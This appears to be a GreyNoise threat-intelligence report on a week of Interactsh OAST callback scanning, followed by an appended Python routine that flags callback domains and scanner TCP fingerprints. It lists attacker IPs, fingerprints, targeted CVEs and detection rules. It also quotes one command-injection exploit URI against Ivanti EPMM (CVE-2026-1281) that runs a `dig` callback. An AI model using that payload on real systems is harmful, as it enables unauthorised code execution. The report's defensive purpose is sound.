GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-13

GreyNoise observed 6,197 sessions from 79 unique IPs across 73 Interactsh OAST campaigns targeting the GreyNoise Global Observation Grid between February 7-13, 2026. The activity spans five Interactsh domain variants, involves 100+ distinct CVE exploitation techniques, and reveals coordinated infrastructure across Cloudflare-proxied endpoints, Oracle Cloud, PROSPERO OOO, and Vietnamese hosting providers.
Tags: OAST, MCP, projectdiscovery, interactsh, rce, iocs, detection engineering, cybersecurity

Author: 🔮Orbie✨

Published: February 15, 2026

Overview

OAST domains appeared across multiple HTTP fields: request bodies (4,331 occurrences, 52.8%), URI paths (1,709, 20.8%), request header values (1,272, 15.5%), URL paths (392, 4.8%), cookies (383, 4.7%), and user-agent strings (122, 1.5%). The distribution across multiple injection vectors indicates automated vulnerability scanning toolkits that embed callback domains into every exploitable parameter.

Five Interactsh domain variants were observed: oast.pro (4,182 occurrences across 22 campaigns), oast.live (1,970, 21 campaigns), oast.fun (857, 16 campaigns), oast.me (767, 11 campaigns), and oast.site (433, 13 campaigns). All domains used the standard Interactsh encoding format with campaign, machine_id, PID, and nonce fields.

JA4T TCP fingerprint analysis (sourced from raw session data) identified three dominant infrastructure clusters: a Cloudflare proxy signature (MSS 1380, 2,973 sessions), a standard Linux stack (MSS 1460, 1,124 sessions), and an anomalous localhost-like signature (MSS 65495, 1,276 sessions across two window size variants) characteristic of Nuclei and similar scanning frameworks.

NOTE: This edition ends with a supplemental section that deep-dives into selected OAST infrastructure components.

Temporal Analysis

Activity peaked during the first two days of the observation window, then declined:

| Day | OAST Count | Sessions | Unique IPs |
|---|---|---|---|
| Feb 7 | 2,757 | 2,233 | 18 |
| Feb 8 | 2,045 | 1,765 | 20 |
| Feb 9 | 566 | 373 | 16 |
| Feb 10 | 1,016 | 562 | 37 |
| Feb 11 | 1,011 | 781 | 16 |
| Feb 12 | 553 | 362 | 6 |
| Feb 13 | 261 | 121 | 11 |

The Feb 7-8 peak corresponds to the dominant ibe4q campaign (Cloudflare-proxied infrastructure). February 10 saw a spike in unique IPs (37) despite moderate session volume, indicating new scanner infrastructure rotating in. Burst analysis identified concentrated activity windows at Feb 8 16:00-17:00 UTC (330+323 sessions) and Feb 11 20:00 UTC (258 sessions), both associated with Oracle Cloud-based scanning.

Campaign Analysis

The 73 campaigns cluster into distinct operational groups based on infrastructure, timing, and payload overlap.

Campaign Group 1: Cloudflare-Proxied Scanning (ibe4q, bjibe)

The largest campaign cluster, ibe4q, generated 3,157 OAST domain occurrences across 2,759 sessions from 9 Cloudflare-proxied IPs (AS13335), all geolocated to Brazil. Activity ran from Feb 7 00:00 UTC through Feb 9 05:35 UTC. A related campaign bjibe (238 occurrences, 202 sessions, 8 IPs) operated concurrently from Feb 7-8. Both campaigns share the same machine_id and use all six OAST injection vectors (requestBody, uri, path, requestCookie, requestHeaderValue, useragent), indicating a comprehensive vulnerability scanning toolkit.

Top IPs: 104.28.193.87 (1,158 sessions), 104.28.193.83 (418), 104.28.193.82 (379), 104.28.193.84 (277), 104.28.225.85 (262).

JA4T fingerprint: 65535_2-4-8-1-3_1380_13 (uniform across all 9 IPs). The MSS 1380 confirms Cloudflare tunnel/proxy traversal. The Cloudflare proxy masks the true origin infrastructure. The Brazilian geolocation likely reflects Cloudflare edge selection rather than attacker location.

Campaign Group 2: Oracle Cloud Multi-Campaign Scanners

Four Oracle Corporation IPs (AS31898) operated across 13 campaigns with 1,243 total sessions:

| IP | Country | Campaigns | Sessions | Active Period |
|---|---|---|---|---|
| 204.216.147.144 | Brazil | 5 (37d6c, b7d6c, fhr7d, j7d6c, r7d6c) | 591 | Feb 8-11 |
| 147.224.178.225 | United States | 4 (3fk04, gt3fk, jfk04, rfk04) | 365 | Feb 10-11 |
| 168.107.59.85 | South Korea | 1 (c9ndh) | 198 | Feb 12 |
| 144.24.88.37 | South Korea | 3 (3grt7, 3t7nn, rt7nn) | 89 | Feb 8-10 |

GreyNoise first observed 204.216.147.144 on 2024-09-10 (35,367 total hits across 8 sensors), indicating established scanning infrastructure. IP 147.224.178.225 first appeared 2026-02-01 (23,109 hits, 10 sensors) and carries GreyNoise tags for both CVE-2026-1281 (Ivanti EPMM) and CVE-2026-0770. All Oracle IPs used path, requestBody, requestCookie, requestHeaderValue, and uri injection vectors – the broadest payload diversity observed.

JA4T fingerprint: Primarily 64240_2-4-8-1-3_1460_7 (standard Linux), consistent across 204.216.147.144, 168.107.59.85, and 144.24.88.37. However, 147.224.178.225 uses both the standard Linux fingerprint (132 sessions) and the Nuclei/loopback fingerprint 65495_2-4-8-1-3_65495_7 (233 sessions), indicating dual-tool deployment – possibly a standard scanner plus Nuclei on the same host.

Campaign Group 3: Private Layer / Switzerland (7gveu)

A single IP, 179.43.146.42 (AS51852, Private Layer INC, Switzerland), generated 511 OAST domains across 456 sessions in campaign 7gveu, active throughout the entire observation window (Feb 7-13). GreyNoise first observed this IP on 2026-02-03 (43,110 hits across 38 sensors). The sustained, continuous scanning pattern across 7 days suggests automated, unattended operation. All six injection vectors were used.

JA4T fingerprint: Primarily 32120_2-4-8-1-3_1460_7 (350 sessions) – a non-standard TCP window size of 32120 that serves as a strong single-actor indicator. This IP also exhibited 65495_2-4-8-1-3_65495_7 (106 sessions), indicating it runs Nuclei alongside a custom scanning tool with a distinctive TCP stack.

Campaign Group 4: PROSPERO OOO / Ivanti EPMM Exploitation (f984d, il84d, ito4d, fbg4d)

IP 193.24.123.42 (AS200593, PROSPERO OOO, Russia) operated 4 campaigns with 169 sessions between Feb 7-8. This IP stands out for exclusive exploitation of CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection). URI analysis reveals a specific exploit pattern targeting the Ivanti EPMM app store endpoint:

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1770526185,
h=gPath[`dig <OAST_DOMAIN> > /dev/null`]/39IUqFPJtv5RscnibeX4OUpsHTa.ipa

The payload injects a dig command via the gPath parameter to trigger DNS callbacks to OAST domains, confirming command execution. Target IPs in the 38.48.0.0/24 range (GreyNoise sensor space) were systematically enumerated. OAST domains were found only in path and uri fields, consistent with this specific exploit vector.

JA4T fingerprint: 65495_2-4-8-1-3_65495_7 (166 sessions) with a secondary 33280_2-4-8-1-3_65495_7 (3 sessions). The MSS 65495 confirms Nuclei-based tooling, consistent with the Interactsh OAST integration.

GreyNoise has tracked this IP since 2025-06-12 (147,752 total hits across 2,770 sensors). One additional IP, from AS215730, also triggered the CVE-2026-1281 tag via campaign hag80.

Campaign Group 5: AS215540 / GCS LLP (ka1vu, geka1)

IP 46.29.235.157 (AS215540, GLOBAL CONNECTIVITY SOLUTIONS LLP, Netherlands) ran 2 campaigns with 287 sessions between Feb 8-9. GreyNoise first observed this IP on 2026-02-08 (9,881 hits, 6 sensors) – appearing in GreyNoise records at the same time as this observation window. The IP shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with two other IPs (45.138.101.232 and 37.60.230.90), suggesting common scanning tooling.

JA4T analysis reveals three distinct TCP fingerprints from this single IP: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary), 65495_2-4-8-1-3_65495_7 (69 sessions), and 33280_2-4-8-1-3_65495_7 (25 sessions). The primary fingerprint uses non-standard TCP option ordering (2-1-3-1-1-4 vs the Linux default 2-4-8-1-3) and MSS 1400, consistent with a VPN or WireGuard tunnel. The two secondary fingerprints (MSS 65495) indicate concurrent Nuclei deployment. This IP runs at least two distinct scanning tools through different network paths.

Campaign Group 6: Vietnamese Infrastructure (p7a5r, 97a5r, mt4kp)

Two Vietnamese hosting providers contributed 375 sessions:

  • 103.144.87.192 (AS135932, Viet Storage): campaigns p7a5r and 97a5r, 264 sessions, Feb 9-13. Generated 1,177 unique OAST domains across only 264 sessions – the highest domain-to-session ratio observed, indicating payload reuse or multi-vector injection per session.
  • 103.252.93.81 (AS135918, Viet Digital): campaign mt4kp, 111 sessions, Feb 9-10. OAST domains embedded exclusively in requestBody, consistent with Log4j/deserialization-focused exploitation.

Campaign Group 7: Estonian Infrastructure (asgsb)

IP 45.138.101.232 (AS41745, Baykov Ilya Sergeevich, Estonia) ran campaign asgsb with 130 sessions on Feb 11. GreyNoise first observed this IP on 2026-02-11 (10,524 hits, 6 sensors) – brand new infrastructure. It shares its JA3 fingerprint with the AS215540 and Contabo IPs.

JA4T fingerprint: 64860_2-4-8-1-3_1380_7. The MSS 1380 matches the Cloudflare cluster’s tunnel signature, but the window size (64860) and TTL (7) differ from the Cloudflare cluster’s 65535 and 13. This suggests a different tunnel provider or VPN with similar MTU constraints. The unique JA4T, combined with the shared JA3, indicates the same TLS-layer scanner tool deployed behind a different network tunnel than the AS215540 and Contabo nodes.

Payload Analysis

GreyNoise tags identified 100+ distinct CVE exploitation techniques across the session data. The top exploitation categories:

| Category | Tag | Occurrences | Unique IPs |
|---|---|---|---|
| Log4j RCE | Apache Log4j RCE Attempt | 2,131 | 26 |
| Linux Command Injection | Generic Suspicious Linux Command in Request | 1,703 | 54 |
| Ivanti EPMM | CVE-2026-1281 RCE Attempt | 344 | 2 |
| XSS Probing | Generic XSS Commands in Request | 320 | 25 |
| Fastjson RCE | Fastjson RCE Attempt | 305 | 19 |
| Path Traversal | Generic Path Traversal Attempt | 178 | 18 |
| Apache OFBiz | CVE-2024-32113 Path Traversal | 135 | 7 |
| Apache OFBiz | Authentication Bypass Attempt | 123 | 6 |
| Cisco HyperFlex | HX RCE Vuln Check | 114 | 30 |
| GPON Router | CVE-2018-10561 Router Worm | 114 | 10 |
| XStream RCE | Generic XStream RCE Attempt | 88 | 19 |
| Atlassian Confluence | CVE-2022-26134 OGNL Injection | 78 | 7 |
| Spring Cloud Gateway | Code Injection | 73 | 12 |
| XStream | CVE-2021-39152 Input Stream | 66 | 10 |

Notable CVE targets by recency:

  • CVE-2026-1281 (Ivanti EPMM Code Injection): 344 occurrences, 2 IPs – active exploitation of a 2026 vulnerability
  • CVE-2026-0770: Tagged on IP 147.224.178.225 (Oracle Cloud)
  • CVE-2025-4123 (Grafana Path Traversal XSS): 44 occurrences, 8 IPs
  • CVE-2025-2777/2775/2776 (SysAid On-Prem XXE): 21 occurrences each, 6 IPs
  • CVE-2025-34028 (Commvault Command Center RCE): 21 occurrences, 6 IPs
  • CVE-2025-8943 (Flowise Authentication Bypass RCE): 18 occurrences, 5 IPs
  • CVE-2025-8085 (Ditty WordPress Plugin): 15 occurrences, 3 IPs

The payload arsenal spans enterprise software (Oracle WebLogic, SAP, Atlassian, Adobe ColdFusion), network appliances (Cisco, Sophos, Palo Alto, Draytek), IoT/consumer devices (GPON, WAVLINK, D-Link, LG), and emerging AI/ML infrastructure (Ollama, Flowise, Anyscale Ray).

Infrastructure Analysis

JA4T TCP Fingerprint Clustering

JA4T fingerprints extracted from raw session data reveal three distinct TCP stack clusters accounting for 98.6% of OAST sessions:

| JA4T Fingerprint | Window | MSS | TTL | Sessions | IPs | ASNs | Interpretation |
|---|---|---|---|---|---|---|---|
| 65535_2-4-8-1-3_1380_13 | 65535 | 1380 | 13 | 2,973 | 9 | 1 | Cloudflare proxy/tunnel |
| 64240_2-4-8-1-3_1460_7 | 64240 | 1460 | 7 | 1,124 | 18 | 10 | Standard Linux (cloud VPS) |
| 65495_2-4-8-1-3_65495_7 | 65495 | 65495 | 7 | 1,082 | 26 | 22 | Nuclei/loopback scanning |
| 32120_2-4-8-1-3_1460_7 | 32120 | 1460 | 7 | 350 | 1 | 1 | Private Layer (custom stack) |
| 33280_2-4-8-1-3_65495_7 | 33280 | 65495 | 7 | 194 | 8 | 8 | Nuclei variant (alt window) |
| 64240_2-1-3-1-1-4_1400_8 | 64240 | 1400 | 8 | 193 | 1 | 1 | AS215540 primary tool |
| 64860_2-4-8-1-3_1380_7 | 64860 | 1380 | 7 | 130 | 1 | 1 | Estonian scanner (tunnel) |

Cluster 1 – Cloudflare Proxy (MSS 1380, 2,973 sessions): The fingerprint 65535_2-4-8-1-3_1380_13 is exclusive to AS13335 (Cloudflare). The MSS 1380 value (20 bytes below the standard 1400 for tunneled traffic) confirms these sessions traverse a Cloudflare tunnel or Workers proxy. The maximum window size (65535) and TTL of 13 (initial TTL 64 minus ~51 hops through proxy infrastructure) are consistent with Cloudflare’s edge network. All 9 IPs in the 104.28.193.x and 104.28.225.x ranges share this identical fingerprint.

Cluster 2 – Standard Linux VPS (MSS 1460, 1,124 sessions): The fingerprint 64240_2-4-8-1-3_1460_7 represents a default Linux TCP stack (window 64240, standard Ethernet MSS 1460, TTL 7 = initial 64 minus ~57 hops). This cluster spans 18 IPs across 10 ASNs including Oracle (AS31898), Contabo (AS51167), and DigitalOcean (AS14061). Key IPs: 204.216.147.144 (Oracle, 591 sessions), 168.107.59.85 (Oracle, 198 sessions), 144.24.88.37 (Oracle, 89 sessions), 37.60.230.90 (Contabo, 87 sessions). The Oracle Cloud IPs all share this fingerprint, supporting their grouping as a single operational cluster.

Cluster 3 – Nuclei/Loopback Scanner (MSS 65495, 1,276 sessions): Two fingerprint variants share the anomalous MSS value of 65495: 65495_2-4-8-1-3_65495_7 (1,082 sessions, 26 IPs) and 33280_2-4-8-1-3_65495_7 (194 sessions, 8 IPs). MSS 65495 is the Linux loopback interface MSS (65535 minus 40 bytes TCP/IP overhead), indicating the scanning tool binds to a loopback address or uses a local proxy before egressing. This is a known signature of Nuclei and Interactsh-integrated scanning frameworks. The cluster spans 22 ASNs across 14 countries – the widest geographic distribution of any fingerprint – consistent with a widely deployed open-source tool.

Notable MSS 65495 users:

  • 147.224.178.225 (Oracle, US): 233 sessions – uses both standard Linux and Nuclei fingerprints across different campaigns
  • 193.24.123.42 (PROSPERO, Russia): 166 sessions – Ivanti EPMM exploitation
  • 103.144.87.192 (Viet Storage): 135 sessions with MSS 65495, plus 129 sessions with window 33280 variant
  • 179.43.146.42 (Private Layer): 106 sessions (secondary fingerprint alongside its primary 32120 stack)
  • Tor exit nodes (Emerald Onion, Stiftung Erneuerbare Freiheit): tau2 campaigns

Multi-Fingerprint IPs: Twelve IPs exhibited multiple JA4T fingerprints, indicating either multiple scanning tools or configuration changes during operation. The most notable is 46.29.235.157 (AS215540) with three distinct fingerprints: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary tool), 65495_2-4-8-1-3_65495_7 (69 sessions, Nuclei), and 33280_2-4-8-1-3_65495_7 (25 sessions, Nuclei variant). The primary fingerprint uses non-standard TCP options (2-1-3-1-1-4 vs the typical 2-4-8-1-3) and MSS 1400, suggesting a VPN or tunnel endpoint.

JA4T + JA4H Combined Clustering

Cross-referencing TCP and HTTP fingerprints identifies the tightest infrastructure groupings:

| JA4T | JA4H | Sessions | IPs | ASNs | Assessment |
|---|---|---|---|---|---|
| 65535..1380_13 | po11nn06..4ea4093e6290 | 997 | 9 | 1 | Cloudflare cluster, POST w/ 6 headers |
| 64240..1460_7 | po11nn06..4ea4093e6290 | 330 | 5 | 2 | Linux VPS, same HTTP toolkit |
| 65535..1380_13 | ge11nn04..532a1ee47909 | 310 | 9 | 1 | Cloudflare cluster, GET w/ 4 headers |
| 65495..65495_7 | ge11nn04..532a1ee47909 | 282 | 14 | 12 | Nuclei, GET variant |
| 65495..65495_7 | po11nn06..4ea4093e6290 | 279 | 11 | 11 | Nuclei, POST variant |

The Cloudflare proxy cluster uses both POST-heavy (po11nn06) and GET-heavy (ge11nn04) HTTP patterns but shares a single JA4T fingerprint, confirming a unified origin behind the proxy. The Nuclei cluster uses the same HTTP fingerprint variants but from 22+ different ASNs – the HTTP toolkit is shared but the TCP signature betrays the loopback scanning architecture.

Tor Exit Node Cluster (tau2 campaigns)

The tau2 campaign family (atau2, itau2, 2tau2, qtau2) operated across 23 sessions from privacy-focused infrastructure:

| ASN | Organization | IPs | Sessions | JA4T Fingerprints |
|---|---|---|---|---|
| AS60729 | Stiftung Erneuerbare Freiheit | 3 | 4 | 3 distinct |
| AS396507 | Emerald Onion | 3 | 4 | 3 distinct |
| AS214503 | QuxLabs AB | 2 | 2 | 2 distinct |
| AS210558 | 1337 Services GmbH | 2 | 2 | 2 distinct |
| AS208323 | Foundation for Applied Privacy | 2 | 2 | 1 distinct |
| AS215125 | Church of Cyberology | 2 | 2 | 2 distinct |
| AS399629 | BL Networks | 1 | 3 | 2 distinct |
| AS214209 | Internet Magnate (Pty) Ltd | 2 | 3 | 2 distinct |

All are known Tor exit node operators or privacy-focused hosting providers. The multiple JA4T fingerprints per ASN reflect the heterogeneous nature of Tor exit infrastructure (each exit node has its own TCP stack). Low session counts per IP (1-2) are consistent with Tor circuit rotation. The tau2 campaigns use MSS 65495 (Nuclei), standard 1460 (Linux), and 1436/1452 (VPN tunnels), indicating the scanning tool runs behind Tor with varying exit paths.

JA4H HTTP Fingerprint Clustering

The top JA4H fingerprints span multiple JA4T clusters, confirming shared HTTP-layer tooling across distinct network-layer infrastructure:

| JA4H Fingerprint | Unique IPs | ASNs | Occurrences |
|---|---|---|---|
| po11nn060000_4ea4093e6290 | 28 | 16 | 1,933 |
| ge11nn040000_532a1ee47909 | 36 | 18 | 828 |
| po11nn08en00_9cf61e78b7a7 | 22 | 11 | 449 |
| po11nn060000_da66f5d9ff4c | 16 | 10 | 243 |
| po11nr070000_6b557635aee2 | 18 | 7 | 223 |

The dominant fingerprint po11nn060000_4ea4093e6290 appeared across 28 IPs in 16 ASNs spanning 12 countries. The po11 prefix indicates HTTP/1.1 POST requests with no cookies or referer. This distribution is consistent with widely deployed scanning tooling (Nuclei or similar frameworks).

One JA4H fingerprint, ge11nr17${jn_8062e975b6e7, contains a JNDI injection fragment in the hash – the ${jn prefix indicates Log4j payloads embedded in HTTP headers that propagated into the fingerprint computation. This appeared across 13 IPs in 8 ASNs.

Shared JA3 Fingerprint Cluster

Three IPs share JA3 fingerprint 11a384388ad36777e1a2e121495037fe:

| IP | ASN | Country | First Seen | Sessions | JA4T |
|---|---|---|---|---|---|
| 46.29.235.157 | AS215540 (GCS LLP) | Netherlands | 2026-02-08 | 287 | 3 distinct |
| 45.138.101.232 | AS41745 (Baykov) | Estonia | 2026-02-11 | 132 | 64860..1380_7 |
| 37.60.230.90 | AS51167 (Contabo) | France | 2026-01-12 | 87 | 64240..1460_7 |

All three IPs appeared in GreyNoise records within the past 5 weeks. The shared JA3 fingerprint across three distinct ASNs suggests a common TLS library and configuration. Despite sharing JA3, their JA4T fingerprints differ: AS215540 uses three TCP stacks (including the unusual 2-1-3-1-1-4 option ordering), Estonia uses MSS 1380 (tunnel), and Contabo uses standard Linux. This indicates the same application-layer tool deployed across different network configurations.

ASN Distribution

| ASN | Organization | Sessions | IPs | Campaigns |
|---|---|---|---|---|
| AS13335 | Cloudflare, Inc. | 2,987 | 20 | 5 |
| AS31898 | Oracle Corporation | 1,243 | 4 | 13 |
| AS51852 | Private Layer INC | 456 | 1 | 1 |
| AS215540 | Global Connectivity Solutions LLP | 287 | 1 | 2 |
| AS135932 | Viet Storage | 264 | 1 | 2 |
| AS200593 | PROSPERO OOO | 169 | 1 | 4 |
| AS41745 | Baykov Ilya Sergeevich | 132 | 1 | 1 |
| AS135918 | Viet Digital Technology | 111 | 1 | 1 |
| AS14061 | DigitalOcean, LLC | 91 | 9 | 11 |
| AS51167 | Contabo GmbH | 87 | 1 | 5 |

PROSPERO OOO (AS200593) is a hosting provider with a documented history of enabling malicious activity. The combination of PROSPERO hosting and exclusive CVE-2026-1281 exploitation represents the most operationally distinct cluster in this dataset.

Attribution Assessment

Confidence: Low-Medium

The data supports identification of distinct operational clusters but not definitive attribution to specific threat actors.

What the data shows:

  • At least 5-7 operationally distinct groups based on infrastructure, campaign patterns, and payload focus
  • JA4T fingerprinting strengthens cluster boundaries: three TCP stack families (Cloudflare MSS 1380, standard Linux MSS 1460, Nuclei MSS 65495) cleanly partition the dataset
  • The PROSPERO/Ivanti EPMM cluster is the most clearly differentiated, with exclusive focus on CVE-2026-1281 and a specific dig-based command injection payload, running Nuclei (MSS 65495)
  • Oracle Cloud IPs operate the broadest vulnerability scanning toolkit across the most campaigns (13), with a consistent standard Linux TCP stack (64240_2-4-8-1-3_1460_7), suggesting a scanning-as-a-service or bug bounty automation platform
  • The shared JA3 fingerprint across AS215540/AS41745/Contabo points to common TLS tooling, but divergent JA4T fingerprints reveal different network-layer configurations (VPN tunnel, tunnel MSS 1380, standard Linux)
  • Private Layer IP 179.43.146.42 has a unique JA4T window size (32120) that serves as a high-confidence single-actor tracking identifier
  • 12 IPs exhibited multiple JA4T fingerprints, indicating dual-tool deployment (typically a primary scanner + Nuclei)
  • Cloudflare-proxied infrastructure has a uniform JA4T (65535_2-4-8-1-3_1380_13 across all 9 IPs), consistent with a single origin behind the proxy

What remains unknown:

  • Whether the Cloudflare-proxied traffic represents one actor or multiple actors behind a shared proxy (the uniform JA4T suggests a single origin, but Cloudflare normalizes TCP characteristics)
  • The relationship, if any, between Oracle Cloud campaigns (campaign IDs share partial suffixes like 7d6c and fk04, suggesting sequential tool runs from the same operator; uniform JA4T supports single-operator hypothesis)
  • Whether Vietnamese infrastructure represents independent operators or a shared hosting platform (both IPs use MSS 65495 Nuclei fingerprints but with different window sizes, suggesting different host configurations)

Network IOCs

Primary IPs (by session volume):

| IP | ASN | Country | Sessions | Campaigns | GreyNoise Classification |
|---|---|---|---|---|---|
| 104.28.193.87 | AS13335 | Brazil | 1,158 | 3 | Malicious |
| 204.216.147.144 | AS31898 | Brazil | 591 | 5 | Malicious |
| 179.43.146.42 | AS51852 | Switzerland | 456 | 1 | Malicious |
| 104.28.193.83 | AS13335 | Brazil | 418 | 2 | Malicious |
| 104.28.193.82 | AS13335 | Brazil | 379 | 2 | Malicious |
| 147.224.178.225 | AS31898 | United States | 365 | 4 | Malicious |
| 46.29.235.157 | AS215540 | Netherlands | 287 | 2 | Malicious |
| 103.144.87.192 | AS135932 | Vietnam | 264 | 2 | Malicious |
| 193.24.123.42 | AS200593 | Russia | 169 | 4 | Malicious |
| 45.138.101.232 | AS41745 | Estonia | 132 | 1 | Malicious |
| 103.252.93.81 | AS135918 | Vietnam | 111 | 1 | Malicious |
| 168.107.59.85 | AS31898 | South Korea | 198 | 1 | Malicious |
| 37.60.230.90 | AS51167 | France | 87 | 5 | Malicious |

OAST Domains/Providers:

All domains use the Interactsh OAST platform across five TLDs:

  • *.oast.pro (4,182 occurrences, 22 campaigns)
  • *.oast.live (1,970, 21 campaigns)
  • *.oast.fun (857, 16 campaigns)
  • *.oast.me (767, 11 campaigns)
  • *.oast.site (433, 13 campaigns)

JA4T TCP Fingerprints (for detection):

  • 65535_2-4-8-1-3_1380_13 – Cloudflare proxy cluster (2,973 sessions, 9 IPs)
  • 65495_2-4-8-1-3_65495_7 – Nuclei/loopback scanner (1,082 sessions, 26 IPs, 22 ASNs)
  • 33280_2-4-8-1-3_65495_7 – Nuclei variant (194 sessions, 8 IPs)
  • 32120_2-4-8-1-3_1460_7 – Private Layer custom stack (350 sessions, 1 IP)
  • 64240_2-1-3-1-1-4_1400_8 – AS215540 VPN/tunnel tool (193 sessions, 1 IP)
  • 64860_2-4-8-1-3_1380_7 – Estonian tunnel scanner (130 sessions, 1 IP)

JA4H HTTP Fingerprints (for detection):

  • po11nn060000_4ea4093e6290_000000000000_000000000000 (1,933 occurrences)
  • ge11nn040000_532a1ee47909_000000000000_000000000000 (828 occurrences)
  • po11nn08en00_9cf61e78b7a7_000000000000_000000000000 (449 occurrences)

Shared JA3 Fingerprint:

  • 11a384388ad36777e1a2e121495037fe (used by 46.29.235.157, 45.138.101.232, 37.60.230.90)

Detection Recommendations

  1. Block or alert on PROSPERO OOO infrastructure (AS200593, specifically 193.24.123.42) – this ASN has a documented history of hosting malicious operations and was observed exclusively targeting CVE-2026-1281.
  2. Prioritize patching for CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection) – active exploitation observed with functional dig-based command injection payloads targeting the /mifs/c/appstore/fob/ endpoint.
  3. Monitor for Interactsh callback domains (*.oast.pro, *.oast.live, *.oast.fun, *.oast.me, *.oast.site) in DNS logs, HTTP request bodies, URI paths, cookies, headers, and user-agent strings.
  4. Alert on the shared JA3 fingerprint 11a384388ad36777e1a2e121495037fe associated with the coordinated scanning cluster across AS215540, AS41745, and Contabo.
  5. Detect Nuclei-based scanning via JA4T – MSS 65495 (fingerprints 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) is a high-fidelity indicator of loopback-proxied scanning tools. This signature accounted for 1,276 sessions (20.6%) across 26 IPs and 22 ASNs.
  6. Track the Private Layer custom TCP stack – JA4T 32120_2-4-8-1-3_1460_7 (window 32120) is unique to IP 179.43.146.42 and provides a single-actor tracking fingerprint for this sustained 7-day scanner.
  7. Review exposure to 2025-2026 CVEs actively targeted: CVE-2025-4123 (Grafana), CVE-2025-2775/2776/2777 (SysAid), CVE-2025-34028 (Commvault), CVE-2025-8943 (Flowise), CVE-2025-61882 (Oracle E-Business Suite).
  8. WAF rules: Block requests containing oast.pro, oast.live, oast.fun, oast.me, oast.site in any HTTP field. These domains have no legitimate use in production traffic.
  9. Monitor Oracle Cloud ranges (AS31898) for broad vulnerability scanning – 4 IPs operated 13 campaigns across 3 countries, using standard Linux TCP stacks (64240_2-4-8-1-3_1460_7).
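
The detection rules above, as an added example that is not from the report or from GreyNoise: a Python triage routine that checks the six HTTP fields named in the report for Interactsh callback hosts (recommendations 3 and 8) and labels each session's JA4T fingerprint against the report's detection list and the MSS 65495 loopback heuristic (recommendations 5 and 6). The session records, their field names and the IP addresses are constructed for the example; the JA4T strings and cluster labels are the report's own.

```python
import re
from dataclasses import dataclass

# Interactsh callback suffixes named in the report; a callback host has at least one label in front.
OAST_SUFFIXES = ("oast.pro", "oast.live", "oast.fun", "oast.me", "oast.site")
OAST_RE = re.compile(
    r"\b((?:[a-z0-9-]+\.)+(?:%s))\b" % "|".join(re.escape(s) for s in OAST_SUFFIXES),
    re.IGNORECASE,
)

# The six HTTP fields in which the report saw callback domains embedded.
OAST_FIELDS = ("requestBody", "uri", "path", "requestCookie", "requestHeaderValue", "useragent")

# Fingerprints from "JA4T TCP Fingerprints (for detection)". Standard Linux
# (64240_2-4-8-1-3_1460_7) is deliberately absent: too common to be an indicator alone.
KNOWN_JA4T = {
    "65535_2-4-8-1-3_1380_13": "Cloudflare proxy cluster",
    "65495_2-4-8-1-3_65495_7": "Nuclei/loopback scanner",
    "33280_2-4-8-1-3_65495_7": "Nuclei/loopback scanner (alt window)",
    "32120_2-4-8-1-3_1460_7": "Private Layer custom stack",
    "64240_2-1-3-1-1-4_1400_8": "AS215540 VPN/tunnel tool",
    "64860_2-4-8-1-3_1380_7": "Estonian tunnel scanner",
}
LOOPBACK_MSS = 65495  # Linux loopback MSS; the report's Nuclei indicator

@dataclass(frozen=True)
class Ja4t:
    window: int
    options: tuple   # TCP option kinds in SYN order, e.g. (2, 4, 8, 1, 3)
    mss: int
    tail: int        # fourth JA4T field (the report reads it as TTL); unused by these rules

def parse_ja4t(fp: str) -> Ja4t:
    """Split a JA4T string such as '64240_2-4-8-1-3_1460_7' into its four fields."""
    parts = fp.split("_")
    if len(parts) != 4:
        raise ValueError(f"not a JA4T fingerprint: {fp!r}")
    window, options, mss, tail = parts
    return Ja4t(int(window), tuple(int(o) for o in options.split("-")), int(mss), int(tail))

def classify_ja4t(fp: str) -> str:
    """Label a fingerprint: exact match on the report's list first, then MSS/option heuristics."""
    if fp in KNOWN_JA4T:
        return KNOWN_JA4T[fp]
    try:
        t = parse_ja4t(fp)
    except ValueError:
        return "malformed JA4T"
    if t.mss == LOOPBACK_MSS:
        return "Nuclei/loopback scanner (MSS 65495, unlisted window)"
    if t.options != (2, 4, 8, 1, 3):
        return "non-default TCP option order (possible tunnel/VPN)"
    if t.mss == 1460:
        return "standard Linux stack (not an indicator on its own)"
    return "unclassified"

def is_scanner_ja4t(fp: str) -> bool:
    """True for any listed fingerprint or any stack with the loopback MSS (recommendation 5)."""
    return fp in KNOWN_JA4T or classify_ja4t(fp).startswith("Nuclei/loopback")

def find_oast_domains(session: dict) -> dict:
    """Return {field: [callback hosts]} for every OAST host found in the six fields."""
    hits = {}
    for field in OAST_FIELDS:
        value = session.get(field) or ""
        found = sorted({m.group(1).lower() for m in OAST_RE.finditer(value)})
        if found:
            hits[field] = found
    return hits

def triage(session: dict) -> dict:
    """One verdict per session: alert on a callback host or a scanner-class TCP stack."""
    oast = find_oast_domains(session)
    ja4t = session.get("ja4t") or ""
    return {
        "src_ip": session.get("src_ip"),
        "oast_hit": bool(oast),
        "oast_fields": oast,
        "ja4t_cluster": classify_ja4t(ja4t) if ja4t else "no JA4T",
        "alert": bool(oast) or is_scanner_ja4t(ja4t),
    }

# Constructed sample sessions (not from the report's data); IPs are RFC 5737 documentation addresses.
SAMPLE_SESSIONS = [
    {   # resembles the Cloudflare-proxied cluster: callback host in the body and in a header
        "src_ip": "203.0.113.10", "ja4t": "65535_2-4-8-1-3_1380_13", "path": "/login",
        "requestBody": "username=admin&redirect=http://c3m8f1wq2a9xk0p4ntr7b5vyjd.oast.pro/",
        "requestHeaderValue": "http://c3m8f1wq2a9xk0p4ntr7b5vyjd.oast.live/r",
        "useragent": "Mozilla/5.0",
    },
    {   # resembles the Nuclei/loopback cluster: callback host in the URI only
        "src_ip": "198.51.100.23", "ja4t": "65495_2-4-8-1-3_65495_7", "path": "/api/v1/fetch",
        "uri": "/api/v1/fetch?url=http://b7q2k9zd4wm1xr8fn6tp3csvhl.oast.fun",
    },
    {   # ordinary Linux client with no callback host: must not alert
        "src_ip": "192.0.2.7", "ja4t": "64240_2-4-8-1-3_1460_7", "path": "/healthz",
        "useragent": "curl/8.5.0",
    },
]
```

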